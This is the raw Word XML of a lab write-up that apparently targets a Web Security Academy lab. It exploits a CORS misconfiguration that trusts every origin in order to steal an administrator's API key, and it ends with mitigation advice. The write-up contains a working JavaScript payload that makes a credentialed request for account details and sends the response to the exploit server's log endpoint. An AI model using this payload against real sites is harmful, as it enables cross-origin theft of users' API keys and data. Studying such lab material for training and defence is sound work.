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07E0" w14:textId="32C78108" w:rsidR="00320924" w:rsidRDefault="00821258" w:rsidP="00821258">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00821258">
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C087E" w14:textId="717501EB" w:rsidR="00821258" w:rsidRPr="00F10577" w:rsidRDefault="00F10577" w:rsidP="0077760B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>The application has an insecure CORS configuration in it which forces the application to trust all origins.</w:t>
      </w:r>
      <w:r w:rsidR="00566E4F">
        <w:t xml:space="preserve"> We’ll try to exploit the vulnerability by getting the administrator’s API key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0DB152" w14:textId="77777777" w:rsidR="00821258" w:rsidRDefault="00821258" w:rsidP="00821258">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F4DB11" w14:textId="107FC522"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BA9FE9B" w14:textId="680275D8" w:rsidR="00821258" w:rsidRDefault="00261147"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vulnerable application and log in using the provided credentials and access the </w:t>
      </w:r>
      <w:r w:rsidRPr="00261147">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>my-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">account </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BE0C54" w14:textId="12C2FC64" w:rsidR="003606DC" w:rsidRDefault="003606DC"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Proxy tab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notice that there is a request made named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003606DC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>accountDetails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which contains the API key of the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087FAC43" w14:textId="4503CD95" w:rsidR="000E0652" w:rsidRDefault="00416927"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we will</w:t>
      </w:r>
      <w:r w:rsidR="00BC753C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> send this request to repeater and there we see that the </w:t>
      </w:r>
      <w:r w:rsidR="00BC753C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ACAO</w:t>
      </w:r>
      <w:r w:rsidR="00BC753C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> header is set as true</w:t>
      </w:r>
      <w:r w:rsidR="000E0652">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> which could be a sign that the application allows requests from all origins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7345E8" w14:textId="11EDCDEC"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test this, we will add the Payload 1 in the request and send it, we see that it is accepted so now we will develop an exploit using some malicious JavaScript code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16933BB7" w14:textId="586AB8CB"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add the Payload 2 into the exploit server’s body and store then deliver it to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE9113" w14:textId="2F810622" w:rsidR="00EA0204" w:rsidRPr="000E0652" w:rsidRDefault="00EA0204"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can see that there comes a request with a unique URL and in it there comes the API key of the administrator</w:t>
      </w:r>
      <w:r w:rsidR="00C92793">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoded in URL format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3E1450" w14:textId="77777777" w:rsidR="00821258" w:rsidRDefault="00821258" w:rsidP="00821258">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099A802C" w14:textId="1879777C"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1AB768A" w14:textId="625EC03A" w:rsidR="001D5FBD" w:rsidRDefault="001D5FBD" w:rsidP="001D5FB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Origin: www.random.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66559F8C" w14:textId="43215AF6" w:rsidR="00416927" w:rsidRPr="001D5FBD" w:rsidRDefault="00416927" w:rsidP="001D5FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D5FBD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD69B37"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var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>req</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D999F"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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>req.onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>reqListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCB4059"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gramStart"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>req.open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>('get','https://0aca008404c3aee5805a6c3300ed0005.web-security-academy.net/accountDetails',true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7970A37E"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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>req.withCredentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713D2111"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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>req.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512A7299" w14:textId="77777777" w:rsidR="00416927" w:rsidRPr="00416927" w:rsidRDefault="00416927" w:rsidP="00416927">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647B474C"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>reqListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B2824"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location='/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>log?apiKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>='+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>this.responseText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00416927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EFDEBE"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
    <w:p w14:paraId="46D4E3F2" w14:textId="1A410DEC" w:rsidR="00821258"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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB82E0" w14:textId="77777777" w:rsidR="00821258" w:rsidRDefault="00821258" w:rsidP="00821258">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11579D08" w14:textId="369EA3D9" w:rsidR="005040A4" w:rsidRDefault="005040A4" w:rsidP="00821258">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55E4E8DC" w14:textId="6DEA4CFA" w:rsidR="005040A4" w:rsidRDefault="005040A4" w:rsidP="00821258">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50980CF4" wp14:editId="7435C979">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>419100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6645910" cy="2076450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="172739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98779" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2076450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52720182" w14:textId="3ECE39CF" w:rsidR="005040A4" w:rsidRDefault="005040A4" w:rsidP="00821258">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="088CA294" wp14:editId="1645BC38">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2497455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6645910" cy="1955165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="22735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2976" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1955165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6038B7DE" w14:textId="7B92C6AB" w:rsidR="005040A4" w:rsidRDefault="005040A4" w:rsidP="00821258">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48DC8D20" wp14:editId="501ED9F8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2382520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6645910" cy="2098675"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="11873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90886" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2098675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBCF6A1" w14:textId="77777777" w:rsidR="005040A4" w:rsidRDefault="005040A4" w:rsidP="00821258">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED8ABC7" w14:textId="7AF2B2A9"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DDACD52" w14:textId="161067D8" w:rsidR="004A48E8" w:rsidRPr="004A48E8" w:rsidRDefault="004A48E8" w:rsidP="004A48E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Restrictive CORS Policy:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> The root cause of the vulnerability is the application's permissive CORS configuration. The application should never trust all origins. Update the Access-Control-Allow-Origin header to only allow trusted domains, rather than using a wildcard (*).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7035AB" w14:textId="60FB6A19" w:rsidR="004A48E8" w:rsidRPr="004A48E8" w:rsidRDefault="004A48E8" w:rsidP="004A48E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Credentials with CORS:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you absolutely have to use wildcards in CORS (e.g., for public API endpoints), ensure you don't support credentials (cookies, HTTP authentication, client-side SSL certificates). Set Access-Control-Allow-Credentials to false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2955B1" w14:textId="0ECDF9BE" w:rsidR="000749BF" w:rsidRPr="004A48E8" w:rsidRDefault="004A48E8" w:rsidP="004A48E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>API Key Protection:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> API keys should not be exposed directly in the client side. Rather than making calls directly from the client side that exposes API keys, consider making those calls from the server side. Use server-side sessions or another method to handle sensitive operations.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000749BF" w:rsidRPr="004A48E8" w:rsidSect="008212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30F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="237C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F6873"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="135E6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255C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18A4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331106">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1088160684">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="69673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749BF"/>
    <w:rsid w:val="000E0652"/>
    <w:rsid w:val="001D5FBD"/>
    <w:rsid w:val="00261147"/>
    <w:rsid w:val="002F2030"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003606DC"/>
    <w:rsid w:val="00416927"/>
    <w:rsid w:val="004A48E8"/>
    <w:rsid w:val="004F2D48"/>
    <w:rsid w:val="005040A4"/>
    <w:rsid w:val="00566E4F"/>
    <w:rsid w:val="0077760B"/>
    <w:rsid w:val="00821258"/>
    <w:rsid w:val="00BC753C"/>
    <w:rsid w:val="00C92793"/>
    <w:rsid w:val="00EA0204"/>
    <w:rsid w:val="00F1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5E5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{77BD95C2-9AF3-456C-A9A0-314555A1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258"/>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21258"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0077760B"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>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77760B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0077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8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20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-18T12:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T09:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>